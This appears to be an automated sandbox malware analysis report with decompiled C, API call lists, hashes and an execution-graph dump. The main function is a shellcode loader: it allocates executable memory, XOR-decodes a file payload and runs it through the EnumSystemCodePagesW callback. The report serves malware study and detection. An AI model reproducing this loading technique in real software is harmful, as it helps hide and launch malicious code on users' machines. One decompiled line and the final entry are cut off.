              			E00E11000(void* __ecx, void* __eflags, intOrPtr _a12) {
              				intOrPtr _v8;
              				void* __ebx;
              				void* __edi;
              				intOrPtr _t6;
              				void* _t7;
              				void* _t23;
              				_Unknown_base(*)()* _t24;
              				void* _t29;
              				void* _t30;
              				void* _t31;
              				intOrPtr* _t37;
              
              				_push(_t23);
              				_t31 = 0;
              				_t6 = E00E11151(_t23, _t29, 0, 0x17d78400);
              				 *_t37 = 0xe23000;
              				_v8 = _t6;
              				_t7 = E00E111E3(_a12, _t30);
              				_t24 = VirtualAlloc(0, 0x148a, 0x3000, 0x40);
              				E00E11487(_t24, 0x148a, 1, _t7);
              				_t10 = _v8;
              				if(_v8 != 0) {
              					E00E11540(_t10, 0xcb, 0x17d78400);
              					do {
              						 *(_t24 + _t31) = (((( *(_t24 + _t31) ^ 0x0000009d) + 0x00000001 ^ 0x000000d0) + 0x0000007f ^ 0x000000c5) + 0x00000001 ^ 0x000000b7) + 0x32;
              						_t31 = _t31 + 1;
              					} while (_t31 < 0x148a);
              					EnumSystemCodePagesW(_t24, 0);
              				}
              				return 0;
              			}















              APIs
              • _malloc.LIBCMT ref: 00E1100E
                • Part of subcall function 00E11151: __FF_MSGBANNER.LIBCMT ref: 00E11168
                • Part of subcall function 00E11151: __NMSG_WRITE.LIBCMT ref: 00E1116F
                • Part of subcall function 00E11151: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00E148D7,00000000,00000000,00000000,00000000,?,00E14509,00000018,00E22280), ref: 00E11194
                • Part of subcall function 00E111E3: __wfsopen.LIBCMT ref: 00E111EE
              • VirtualAlloc.KERNEL32(00000000,0000148A,00003000,00000040), ref: 00E11036
              • __fread_nolock.LIBCMT ref: 00E11048
              • _memset.LIBCMT ref: 00E11062
              • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00E11088
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: Alloc$CodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
              • String ID:
              • API String ID: 612201108-0
              • Opcode ID: 86ec7bcd859673f0f6056ce5c6470ecdf3db13715ee95db9774d54a5a9b1f81c
              • Instruction ID: 5c372068dd45a11ccc246e57f51a2a34b8f7bc3f86af1f7d8f098d327493c5ed
              • Opcode Fuzzy Hash: 86ec7bcd859673f0f6056ce5c6470ecdf3db13715ee95db9774d54a5a9b1f81c
              • Instruction Fuzzy Hash: 2B014C71A053047BF72027715C4BFDF7B98DB55758F201491FA01B7182E5F499829274
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00E18BD1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* _t4;
              				void* _t15;
              				void* _t17;
              
              				_push(8);
              				_push(0xe224b0);
              				_t4 = E00E12410(__ebx, __edi, __esi);
              				_t17 =  *0xe23d3c - 0xe23d40; // 0xe23d40
              				if(_t17 != 0) {
              					E00E1443F(0xc);
              					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
              					 *0xe23d3c = E00E173E6("@=\xef\xbf\xbd", 0x
              					 *(_t15 - 4) = 0xfffffffe;
              					_t4 = E00E18C1A();
              				}
              				return E00E12455(_t4);
              			}







              APIs
              • __lock.LIBCMT ref: 00E18BEC
                • Part of subcall function 00E1443F: __mtinitlocknum.LIBCMT ref: 00E14451
                • Part of subcall function 00E1443F: EnterCriticalSection.KERNEL32(00000000,?,00E137BB,0000000D), ref: 00E1446A
              • __updatetlocinfoEx_nolock.LIBCMT ref: 00E18BFC
                • Part of subcall function 00E173E6: ___addlocaleref.LIBCMT ref: 00E17402
                • Part of subcall function 00E173E6: ___removelocaleref.LIBCMT ref: 00E1740D
                • Part of subcall function 00E173E6: ___freetlocinfo.LIBCMT ref: 00E17421
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
              • String ID: @=$@=
              • API String ID: 547918592-965070868
              • Opcode ID: c88c94099e2aede67bb4eb9d19a68137be84662e34fdd79b24ed1f6460fa45f0
              • Instruction ID: 42f03b9cd0e85821d495f9703154dc4d23cab859f8ab9fe07709a741ef8f1e57
              • Opcode Fuzzy Hash: c88c94099e2aede67bb4eb9d19a68137be84662e34fdd79b24ed1f6460fa45f0
              • Instruction Fuzzy Hash: 8CE08671545320EAD6207B717D43BCCF2F05B00B25F50751AF164771C1CD785AC05EA2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00E1A95D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
              				intOrPtr _t25;
              				void* _t26;
              
              				_t25 = _a16;
              				if(_t25 == 0x65 || _t25 == 0x45) {
              					_t26 = E00E1AEAE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
              					goto L9;
              				} else {
              					_t34 = _t25 - 0x66;
              					if(_t25 != 0x66) {
              						__eflags = _t25 - 0x61;
              						if(_t25 == 0x61) {
              							L7:
              							_t26 = E00E1A9E3(_a4, _a8, _a12, _a20, _a24, _a28);
              						} else {
              							__eflags = _t25 - 0x41;
              							if(__eflags == 0) {
              								goto L7;
              							} else {
              								_t26 = E00E1B129(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
              							}
              						}
              						L9:
              						return _t26;
              					} else {
              						return E00E1B068(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
              					}
              				}
              			}






              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmp
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction ID: 489854a5261fd241575a117183a2f0aa3d04ed14917c035307d5b41b11fa13ae
              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction Fuzzy Hash: 6B014C7204114EFBCF125E84DC018EE3F67BB58354B5A9425FE1868031C336C9F1AB82
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:5.8%
              Dynamic/Decrypted Code Coverage:2%
              Signature Coverage:0%
              Total number of Nodes:708
              Total number of Limit Nodes:87
26981->26982 26983 2efae2a 26982->26983 26984 2efabe0 LdrLoadDll 26983->26984 26985 2efae33 26984->26985 26986 2efabe0 LdrLoadDll 26985->26986 26987 2efae3c 26986->26987 26988 2efabe0 LdrLoadDll 26987->26988 26989 2efae48 26988->26989 26990 2efabe0 LdrLoadDll 26989->26990 26991 2efae51 26990->26991 26992 2efabe0 LdrLoadDll 26991->26992 26993 2efae5a 26992->26993 26994 2efabe0 LdrLoadDll 26993->26994 26995 2efae63 26994->26995 26996 2efabe0 LdrLoadDll 26995->26996 26997 2efae6c 26996->26997 26998 2efabe0 LdrLoadDll 26997->26998 26999 2efae75 26998->26999 27000 2efabe0 LdrLoadDll 26999->27000 27001 2efae81 27000->27001 27002 2efabe0 LdrLoadDll 27001->27002 27003 2efae8a 27002->27003 27004 2efabe0 LdrLoadDll 27003->27004 27005 2efae93 27004->27005 27006 2efabe0 LdrLoadDll 27005->27006 27007 2efae9c 27006->27007 27008 2efabe0 LdrLoadDll 27007->27008 27009 2efaea5 27008->27009 27010 2efabe0 LdrLoadDll 27009->27010 27011 2efaeae 27010->27011 27012 2efabe0 LdrLoadDll 27011->27012 27013 2efaeba 27012->27013 27014 2efabe0 LdrLoadDll 27013->27014 27015 2efaec3 27014->27015 27016 2efabe0 LdrLoadDll 27015->27016 27017 2efaecc 27016->27017 27017->26792 27019 2efaf60 LdrLoadDll 27018->27019 27020 2ef9e8c 27019->27020 27048 4c09860 LdrInitializeThunk 27020->27048 27021 2ef9ea3 27021->26714 27023->26789 27025 2efa50c NtAllocateVirtualMemory 27024->27025 27026 2efaf60 LdrLoadDll 27024->27026 27025->26895 27026->27025 27028 2efd0a6 27027->27028 27029 2efd0a0 27027->27029 27030 2efc0b0 2 API calls 27028->27030 27029->26901 27031 2efd0cc 27030->27031 27031->26901 27033 2efd130 27032->27033 27034 2efd18d 27033->27034 27035 2efc0b0 2 API calls 27033->27035 27034->26909 27036 2efd16a 27035->27036 27037 2efbee0 2 API calls 27036->27037 27037->27034 27039 2efbee0 2 API calls 27038->27039 27040 2ef4f74 27039->27040 27040->26920 27041->26905 27043 2efabfb 27042->27043 27044 2ef5a90 LdrLoadDll 27043->27044 27045 2efac1b 27044->27045 27046 2ef5a90 LdrLoadDll 27045->27046 27047 2efaccf 
27045->27047 27046->27047 27047->26941 27048->27021 27050 4c09681 27049->27050 27051 4c0968f LdrInitializeThunk 27049->27051 27050->26798 27051->26798 27053 2efa63c RtlFreeHeap 27052->27053 27054 2efaf60 LdrLoadDll 27052->27054 27053->26802 27054->27053 27056 2ee721b 27055->27056 27057 2ee7220 27055->27057 27056->26722 27058 2efbe60 2 API calls 27057->27058 27064 2ee7245 27058->27064 27059 2ee72a8 27059->26722 27060 2ef9e70 2 API calls 27060->27064 27061 2ee72ae 27063 2ee72d4 27061->27063 27065 2efa570 2 API calls 27061->27065 27063->26722 27064->27059 27064->27060 27064->27061 27066 2efbe60 2 API calls 27064->27066 27071 2efa570 27064->27071 27067 2ee72c5 27065->27067 27066->27064 27067->26722 27069 2efa570 2 API calls 27068->27069 27070 2ee74ee 27069->27070 27070->26679 27072 2efa58c 27071->27072 27073 2efaf60 LdrLoadDll 27071->27073 27076 4c096e0 LdrInitializeThunk 27072->27076 27073->27072 27074 2efa5a3 27074->27064 27076->27074 27078 2efb623 27077->27078 27081 2eea130 27078->27081 27080 2ee906b 27080->26687 27083 2eea154 27081->27083 27082 2eea15b 27082->27080 27083->27082 27084 2eea1a7 27083->27084 27085 2eea190 LdrLoadDll 27083->27085 27084->27080 27085->27084 27087 2eea4a3 27086->27087 27089 2eea520 27087->27089 27101 2ef9c40 LdrLoadDll 27087->27101 27089->26692 27091 2efaf60 LdrLoadDll 27090->27091 27092 2eed59b 27091->27092 27092->26695 27093 2efa780 27092->27093 27094 2efaf60 LdrLoadDll 27093->27094 27095 2efa79f LookupPrivilegeValueW 27094->27095 27095->26697 27097 2efa22c 27096->27097 27098 2efaf60 LdrLoadDll 27096->27098 27102 4c09910 LdrInitializeThunk 27097->27102 27098->27097 27099 2efa24b 27099->26698 27101->27089 27102->27099 27104 2eea627 27103->27104 27105 2eea480 LdrLoadDll 27104->27105 27106 2eea656 27105->27106 27106->26638 27108 2eea374 27107->27108 27163 2ef9c40 LdrLoadDll 27108->27163 27110 2eea3ae 27110->26640 27112 2eed78c 27111->27112 27113 2eea600 LdrLoadDll 27112->27113 27114 2eed79e 27113->27114 27164 2eed670 27114->27164 27117 
2eed7b9 27120 2eed7c4 27117->27120 27121 2efa440 2 API calls 27117->27121 27118 2eed7d1 27119 2eed7e2 27118->27119 27122 2efa440 2 API calls 27118->27122 27119->26644 27120->26644 27121->27120 27122->27119 27124 2eeb4d6 27123->27124 27125 2eeb4e0 27123->27125 27124->26653 27126 2eea480 LdrLoadDll 27125->27126 27127 2eeb551 27126->27127 27128 2eea350 LdrLoadDll 27127->27128 27129 2eeb565 27128->27129 27130 2eeb588 27129->27130 27131 2eea480 LdrLoadDll 27129->27131 27130->26653 27132 2eeb5a4 27131->27132 27133 2ef5690 9 API calls 27132->27133 27134 2eeb5f9 27133->27134 27134->26653 27136 2eec056 27135->27136 27137 2eea480 LdrLoadDll 27136->27137 27138 2eec06a 27137->27138 27184 2eebd20 27138->27184 27140 2ee858c 27161 2eeb610 LdrLoadDll 27140->27161 27213 2eeda20 27141->27213 27143 2ee8233 27157 2ee8431 27143->27157 27218 2ef4fe0 27143->27218 27145 2ee8292 27145->27157 27221 2ee7fd0 27145->27221 27148 2efd090 2 API calls 27149 2ee82d9 27148->27149 27150 2efd1c0 3 API calls 27149->27150 27153 2ee82ee 27150->27153 27151 2ee7210 4 API calls 27152 2ee8340 27151->27152 27152->27151 27152->27157 27159 2ee74d0 2 API calls 27152->27159 27226 2eeb1f0 27152->27226 27276 2eed9c0 27152->27276 27281 2eed4a0 22 API calls 27152->27281 27153->27152 27280 2ee3660 11 API calls 27153->27280 27157->26642 27159->27152 27160->26647 27161->26658 27162->26663 27163->27110 27165 2eed68a 27164->27165 27173 2eed740 27164->27173 27166 2eea480 LdrLoadDll 27165->27166 27167 2eed6ac 27166->27167 27174 2ef9ef0 27167->27174 27169 2eed6ee 27177 2ef9f30 27169->27177 27172 2efa440 2 API calls 27172->27173 27173->27117 27173->27118 27175 2ef9f0c 27174->27175 27176 2efaf60 LdrLoadDll 27174->27176 27175->27169 27176->27175 27178 2ef9f3f 27177->27178 27179 2efaf60 LdrLoadDll 27178->27179 27180 2ef9f4c 27179->27180 27183 4c09fe0 LdrInitializeThunk 27180->27183 27181 2eed734 27181->27172 27183->27181 27185 2eebd37 27184->27185 27193 2eeda60 27185->27193 27189 2eebdab 27190 2eebdb2 27189->27190 27204 2efa250 
LdrLoadDll 27189->27204 27190->27140 27192 2eebdc5 27192->27140 27194 2eeda85 27193->27194 27205 2ee7510 27194->27205 27196 2eedaa9 27197 2ef5690 9 API calls 27196->27197 27198 2eebd7f 27196->27198 27200 2efbee0 2 API calls 27196->27200 27212 2eed8a0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 27196->27212 27197->27196 27201 2efa690 27198->27201 27200->27196 27202 2efa6af CreateProcessInternalW 27201->27202 27203 2efaf60 LdrLoadDll 27201->27203 27202->27189 27203->27202 27204->27192 27206 2ee760f 27205->27206 27207 2ee7525 27205->27207 27206->27196 27207->27206 27208 2ef5690 9 API calls 27207->27208 27209 2ee7592 27208->27209 27210 2efbee0 2 API calls 27209->27210 27211 2ee75b9 27209->27211 27210->27211 27211->27196 27212->27196 27214 2ef5a90 LdrLoadDll 27213->27214 27215 2eeda3f 27214->27215 27216 2eeda4d 27215->27216 27217 2eeda46 SetErrorMode 27215->27217 27216->27143 27217->27216 27282 2eed7f0 27218->27282 27220 2ef5006 27220->27145 27222 2efbe60 2 API calls 27221->27222 27225 2ee7ff5 27221->27225 27222->27225 27223 2ee8210 27223->27148 27225->27223 27301 2ef9830 27225->27301 27227 2eeb209 27226->27227 27228 2eeb20f 27226->27228 27349 2eed2b0 27227->27349 27358 2ee8c20 27228->27358 27231 2eeb21c 27232 2efd1c0 3 API calls 27231->27232 27275 2eeb4b2 27231->27275 27233 2eeb238 27232->27233 27234 2eeb24c 27233->27234 27235 2eed9c0 2 API calls 27233->27235 27367 2ef9cc0 27234->27367 27235->27234 27238 2eeb380 27383 2eeb190 LdrLoadDll LdrInitializeThunk 27238->27383 27239 2ef9eb0 2 API calls 27240 2eeb2ca 27239->27240 27240->27238 27246 2eeb2d6 27240->27246 27242 2eeb39f 27243 2eeb3a7 27242->27243 27384 2eeb100 LdrLoadDll NtClose LdrInitializeThunk 27242->27384 27244 2efa440 2 API calls 27243->27244 27247 2eeb3b1 27244->27247 27249 2eeb329 27246->27249 27252 2ef9fc0 2 API calls 27246->27252 27246->27275 27247->27152 27248 2eeb3c9 27248->27243 27251 2eeb3d0 27248->27251 27250 2efa440 2 API calls 27249->27250 27253 2eeb346 27250->27253 27254 2eeb3e8 
27251->27254 27385 2eeb080 LdrLoadDll LdrInitializeThunk 27251->27385 27252->27249 27370 2ef92e0 27253->27370 27386 2ef9d40 LdrLoadDll 27254->27386 27258 2eeb35d 27258->27275 27373 2ee7680 27258->27373 27259 2eeb3fc 27387 2eeaf00 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 27259->27387 27261 2eeb420 27263 2eeb46d 27261->27263 27388 2ef9d70 LdrLoadDll 27261->27388 27390 2ef9dd0 LdrLoadDll 27263->27390 27267 2eeb43e 27267->27263 27389 2ef9e00 LdrLoadDll 27267->27389 27268 2eeb47b 27269 2efa440 2 API calls 27268->27269 27270 2eeb485 27269->27270 27272 2efa440 2 API calls 27270->27272 27273 2eeb48f 27272->27273 27274 2ee7680 3 API calls 27273->27274 27273->27275 27274->27275 27275->27152 27277 2eed9d3 27276->27277 27464 2ef9e40 27277->27464 27280->27152 27281->27152 27283 2eed80d 27282->27283 27289 2ef9f70 27283->27289 27286 2eed855 27286->27220 27290 2efaf60 LdrLoadDll 27289->27290 27291 2ef9f8c 27290->27291 27299 4c099a0 LdrInitializeThunk 27291->27299 27292 2eed84e 27292->27286 27294 2ef9fc0 27292->27294 27295 2efaf60 LdrLoadDll 27294->27295 27296 2ef9fdc 27295->27296 27300 4c09780 LdrInitializeThunk 27296->27300 27297 2eed87e 27297->27220 27299->27292 27300->27297 27302 2efc0b0 2 API calls 27301->27302 27303 2ef9847 27302->27303 27322 2ee8760 27303->27322 27305 2ef9862 27306 2ef9889 27305->27306 27307 2ef98a0 27305->27307 27308 2efbee0 2 API calls 27306->27308 27309 2efbe60 2 API calls 27307->27309 27310 2ef9896 27308->27310 27311 2ef98da 27309->27311 27310->27223 27312 2efbe60 2 API calls 27311->27312 27313 2ef98f3 27312->27313 27319 2ef9b94 27313->27319 27328 2efbea0 LdrLoadDll 27313->27328 27315 2ef9b79 27316 2ef9b80 27315->27316 27315->27319 27317 2efbee0 2 API calls 27316->27317 27318 2ef9b8a 27317->27318 27318->27223 27320 2efbee0 2 API calls 27319->27320 27321 2ef9be9 27320->27321 27321->27223 27323 2ee8785 27322->27323 27324 2eea130 LdrLoadDll 27323->27324 27325 2ee87b8 27324->27325 27327 2ee87dd 27325->27327 27329 2eeb930 27325->27329 
27327->27305 27328->27315 27330 2eeb95c 27329->27330 27331 2efa190 LdrLoadDll 27330->27331 27332 2eeb975 27331->27332 27333 2eeb97c 27332->27333 27340 2efa1d0 27332->27340 27333->27327 27337 2eeb9b7 27338 2efa440 2 API calls 27337->27338 27339 2eeb9da 27338->27339 27339->27327 27341 2efa1ec 27340->27341 27342 2efaf60 LdrLoadDll 27340->27342 27348 4c09710 LdrInitializeThunk 27341->27348 27342->27341 27343 2eeb99f 27343->27333 27345 2efa7c0 27343->27345 27346 2efa7df 27345->27346 27347 2efaf60 LdrLoadDll 27345->27347 27346->27337 27347->27346 27348->27343 27350 2eed2c7 27349->27350 27391 2eec3a0 27349->27391 27352 2eed2e0 27350->27352 27404 2ee4000 27350->27404 27353 2efc0b0 2 API calls 27352->27353 27355 2eed2ee 27353->27355 27355->27228 27356 2eed2da 27431 2ef9160 27356->27431 27360 2ee8c29 27358->27360 27359 2ee8d5b 27359->27231 27360->27359 27361 2eed670 3 API calls 27360->27361 27362 2ee8d3c 27361->27362 27363 2ee8d6a 27362->27363 27364 2efa440 2 API calls 27362->27364 27366 2ee8d51 27362->27366 27363->27231 27364->27366 27463 2ee6290 LdrLoadDll 27366->27463 27368 2efaf60 LdrLoadDll 27367->27368 27369 2eeb2a0 27368->27369 27369->27238 27369->27239 27369->27275 27371 2eed9c0 2 API calls 27370->27371 27372 2ef9312 27371->27372 27372->27258 27374 2ee7698 27373->27374 27375 2eea130 LdrLoadDll 27374->27375 27376 2ee76b3 27375->27376 27377 2ef5a90 LdrLoadDll 27376->27377 27378 2ee76c3 27377->27378 27379 2ee76fd 27378->27379 27380 2ee76cc PostThreadMessageW 27378->27380 27379->27152 27380->27379 27381 2ee76e0 27380->27381 27382 2ee76ea PostThreadMessageW 27381->27382 27382->27379 27383->27242 27384->27248 27385->27254 27386->27259 27387->27261 27388->27267 27389->27263 27390->27268 27392 2eec3d3 27391->27392 27436 2eea740 27392->27436 27394 2eec3e5 27440 2eea8b0 27394->27440 27396 2eec403 27397 2eea8b0 LdrLoadDll 27396->27397 27398 2eec419 27397->27398 27399 2eed7f0 3 API calls 27398->27399 27400 2eec43d 27399->27400 27401 2eec444 27400->27401 27402 2efc0f0 2 API calls 
27400->27402 27401->27350 27403 2eec454 27402->27403 27403->27350 27405 2ee402c 27404->27405 27406 2eeb930 3 API calls 27405->27406 27408 2ee4103 27406->27408 27407 2ee4695 27407->27356 27408->27407 27443 2efc130 27408->27443 27410 2ee416e 27411 2eea480 LdrLoadDll 27410->27411 27412 2ee42f4 27411->27412 27413 2eea480 LdrLoadDll 27412->27413 27414 2ee4318 27413->27414 27447 2eeb9f0 27414->27447 27418 2ee43b3 27419 2ee4479 27418->27419 27420 2eeb9f0 2 API calls 27418->27420 27422 2efbe60 2 API calls 27419->27422 27421 2ee4452 27420->27421 27421->27419 27424 2efa0d0 2 API calls 27421->27424 27423 2ee44e6 27422->27423 27425 2efbe60 2 API calls 27423->27425 27424->27419 27426 2ee44ff 27425->27426 27426->27407 27427 2eea480 LdrLoadDll 27426->27427 27428 2ee4547 27427->27428 27429 2eea350 LdrLoadDll 27428->27429 27430 2ee45f9 27429->27430 27430->27356 27432 2ef5a90 LdrLoadDll 27431->27432 27433 2ef9181 27432->27433 27434 2ef91a7 27433->27434 27435 2ef9194 CreateThread 27433->27435 27434->27352 27435->27352 27437 2eea74a 27436->27437 27438 2eea480 LdrLoadDll 27437->27438 27439 2eea7a3 27438->27439 27439->27394 27441 2eea480 LdrLoadDll 27440->27441 27442 2eea8c9 27441->27442 27442->27396 27444 2efc13d 27443->27444 27445 2ef5a90 LdrLoadDll 27444->27445 27446 2efc150 27445->27446 27446->27410 27448 2eeba15 27447->27448 27456 2efa040 27448->27456 27451 2efa0d0 27452 2efaf60 LdrLoadDll 27451->27452 27453 2efa0ec 27452->27453 27462 4c09650 LdrInitializeThunk 27453->27462 27454 2efa10b 27454->27418 27457 2efaf60 LdrLoadDll 27456->27457 27458 2efa05c 27457->27458 27461 4c096d0 LdrInitializeThunk 27458->27461 27459 2ee438c 27459->27418 27459->27451 27461->27459 27462->27454 27463->27359 27465 2efaf60 LdrLoadDll 27464->27465 27466 2ef9e5c 27465->27466 27469 4c09840 LdrInitializeThunk 27466->27469 27467 2eed9fe 27467->27152 27469->27467 27470 2ef9030 27471 2efbe60 2 API calls 27470->27471 27473 2ef906b 27470->27473 27471->27473 27472 2ef914c 27473->27472 27474 2eea130 LdrLoadDll 
27473->27474 27475 2ef90a1 27474->27475 27476 2ef5a90 LdrLoadDll 27475->27476 27478 2ef90bd 27476->27478 27477 2ef90d0 Sleep 27477->27478 27478->27472 27478->27477 27481 2ef8c60 LdrLoadDll 27478->27481 27482 2ef8e60 LdrLoadDll 27478->27482 27481->27478 27482->27478

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 658 2efa368-2efa36f 659 2efa3c6-2efa409 call 2efaf60 NtReadFile 658->659 660 2efa371-2efa3b9 call 2efaf60 658->660 660->659
              APIs
              • NtReadFile.NTDLL(02EF59B2,5DA515B3,FFFFFFFF,02EF5671,00000206,?,02EF59B2,00000206,02EF5671,FFFFFFFF,5DA515B3,02EF59B2,00000206,00000000), ref: 02EFA405
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: c6ba91e9cbaa23041456f47e41bd978e5c7a97a281cd564fb88d5fea20e9b5f2
              • Instruction ID: c531e1599aea2744d86400a33628be371ca66ba34d0b35fa58094088cc32681b
              • Opcode Fuzzy Hash: c6ba91e9cbaa23041456f47e41bd978e5c7a97a281cd564fb88d5fea20e9b5f2
              • Instruction Fuzzy Hash: AE21B6B2200108AFCB14DF99DC84EEB77ADEF8C754F158258BA0DA7241D630E811CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 706 2efa30a-2efa361 call 2efaf60 NtCreateFile
              APIs
              • NtCreateFile.NTDLL(00000060,00000005,00000000,02EF57F7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,02EF57F7,00000000,00000005,00000060,00000000,00000000), ref: 02EFA35D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: ccc7fd84b4b5042ce2a941d3682eed9b089ce89de2695920edf379e2f5522b3b
              • Instruction ID: f2d9b78cc215928338e98959d2dabf52ccecfc8bc9ae57c78a8cf47449ddab83
              • Opcode Fuzzy Hash: ccc7fd84b4b5042ce2a941d3682eed9b089ce89de2695920edf379e2f5522b3b
              • Instruction Fuzzy Hash: 2601AFB6241508AFCB58CF99DC85EEB77A9EF8C754F118258BA0DD7240C630E855CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtCreateFile.NTDLL(00000060,00000005,00000000,02EF57F7,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,02EF57F7,00000000,00000005,00000060,00000000,00000000), ref: 02EFA35D
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
              • Instruction ID: 8083525e2ae82b7452f4110d1ee16491cae29089d692d19010d107587abcfbd9
              • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
              • Instruction Fuzzy Hash: C3F06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118258BA0D97241D630F8518BA4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtReadFile.NTDLL(02EF59B2,5DA515B3,FFFFFFFF,02EF5671,00000206,?,02EF59B2,00000206,02EF5671,FFFFFFFF,5DA515B3,02EF59B2,00000206,00000000), ref: 02EFA405
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
              • Instruction ID: 52430b19662c5539141218e5c0ee52ee062031bbf0ff76c8e836df1a8d0d17a2
              • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
              • Instruction Fuzzy Hash: C9F0A4B2200208ABCB14DF99DC84EEB77ADEF8C754F118258BA0D97241D630E811CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EE2D11,00002000,00003000,00000004), ref: 02EFA529
              Memory Dump Source
              • Source File: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_2ee0000_control.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: 28ec41224c71cc0fb6414f2a2324e9c38f229e888071986477ff18e23a59ac25
              • Instruction ID: 6ff9025b49a48478d01eb61ef17e559ec831b4a70fbbbacf16d82c1a0e452fc1
              • Opcode Fuzzy Hash: 28ec41224c71cc0fb6414f2a2324e9c38f229e888071986477ff18e23a59ac25
